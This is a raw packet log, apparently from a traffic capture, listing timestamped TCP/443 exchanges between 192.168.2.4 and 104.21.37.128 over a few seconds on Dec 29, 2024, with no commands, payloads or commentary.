                                                                                                                                                  Dec 29, 2024 16:37:20.328118086 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.328183889 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.328202963 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.328243971 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.358136892 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.489626884 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.489658117 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.489826918 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.489828110 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.489896059 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.489990950 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.494879961 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.494895935 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.494955063 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.494971037 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.495023012 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.500893116 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.500906944 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.500973940 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.500986099 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.501044989 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:20.506834030 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:20.506851912 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.318533897 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.318545103 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.318569899 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.321593046 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.324193001 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.324210882 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.324291945 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.324305058 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.324356079 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.330142975 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.330157995 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.330230951 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.330243111 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.330293894 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.335417986 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.335433006 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.335505962 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.335519075 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.335567951 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.496805906 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.496834040 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.497138977 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.497138977 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.497206926 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.498028040 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.502605915 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.502620935 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.502701044 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.502716064 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.502772093 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.507896900 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.507914066 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.507998943 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.508014917 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.508073092 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.512995958 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.513046026 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.513072968 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.513087034 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.513113976 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.513163090 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.518256903 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.518271923 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.518330097 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.518342018 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.518393040 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.526973963 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.527002096 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.527072906 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.527084112 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.527112961 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.527133942 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.529948950 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.530000925 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.530036926 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.530047894 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.530073881 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.530093908 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.535902023 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.535926104 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.535980940 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.535991907 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:21.536026001 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:21.536043882 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.021939039 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.021950006 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.021989107 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.022026062 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.022059917 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.022171021 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.022171021 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.022372961 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.022388935 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.022439957 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.022450924 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.022488117 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.023252964 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.023267031 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.023327112 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.023335934 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.023370981 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.024862051 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.024876118 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.024929047 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.024940014 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.024976969 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.025974989 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.025989056 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.026036024 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.026046038 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.026067019 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.026089907 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.026894093 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.026910067 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.026956081 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.026966095 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.026999950 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.027774096 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.027793884 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.027822971 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.027832985 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.027854919 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.027867079 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.028748989 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.028763056 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.028803110 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.028811932 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.028846979 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.029716969 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.029731989 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.029762030 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.029772043 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.029786110 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.029803991 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.030487061 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.030663967 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.030678988 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.030724049 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.030733109 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.030767918 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.031585932 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.031606913 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.031632900 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.031641006 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.031660080 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.031673908 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.032538891 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.032552004 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.032598972 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.032609940 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.727226973 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.727264881 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.732721090 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.732733965 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.732795954 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.732820988 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.732872963 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.738795996 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.738811016 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.738874912 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.738898039 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.738934040 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.744076014 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.744090080 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.744154930 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.744177103 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.744226933 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.768691063 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.905591965 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.905611038 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.905689955 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.905721903 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.905761957 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.911550999 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.911566973 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.911633015 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.911657095 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.911696911 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.916824102 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.916837931 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.916896105 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.916918993 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.916958094 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.922913074 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.922926903 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.922995090 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.923017979 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.923057079 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.928832054 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.928847075 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.928915024 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.928936958 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.928977013 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.934528112 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.934542894 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.934603930 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.934628963 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.934669018 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.940478086 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.940505981 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.940553904 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.940574884 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.940593004 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.940610886 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.945760965 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.945775986 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.945847034 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:22.945867062 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:22.945908070 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.000366926 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.112674952 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.112699986 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.112884998 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.112920046 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.113090038 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.117847919 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.117863894 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.117917061 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.117938042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.117978096 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.123835087 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.123850107 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.123912096 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.123939991 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.123985052 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.129879951 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.129910946 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.129972935 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.129997015 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.130036116 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.135497093 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.135512114 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.135586023 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.135608912 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.135648012 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.141570091 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.141585112 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.141652107 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.141676903 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.141717911 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.146847010 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.146861076 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.146930933 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.146955967 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.146996975 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.152777910 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.152791977 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.152858973 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.152884007 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.152924061 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.208980083 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.313625097 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.313647032 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.313693047 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.313723087 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.313743114 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.313776016 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.319547892 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.319562912 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.319598913 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.319610119 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.319645882 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.319664001 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.325586081 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.325601101 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.325635910 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.325654984 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.325676918 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.325691938 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.326927900 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.330887079 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.330900908 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.330965996 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.330985069 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.331026077 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.335798979 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.336836100 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.336848974 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:23.336894035 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:23.336908102 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.144875050 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.144892931 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.144912004 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.150052071 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.150067091 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.150114059 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.150140047 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.150177956 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.156100035 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.156114101 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.156155109 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.156177044 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.156193972 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.156209946 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:24.317857027 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.317877054 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:24.317958117 CET49750443192.168.2.4104.21.37.128
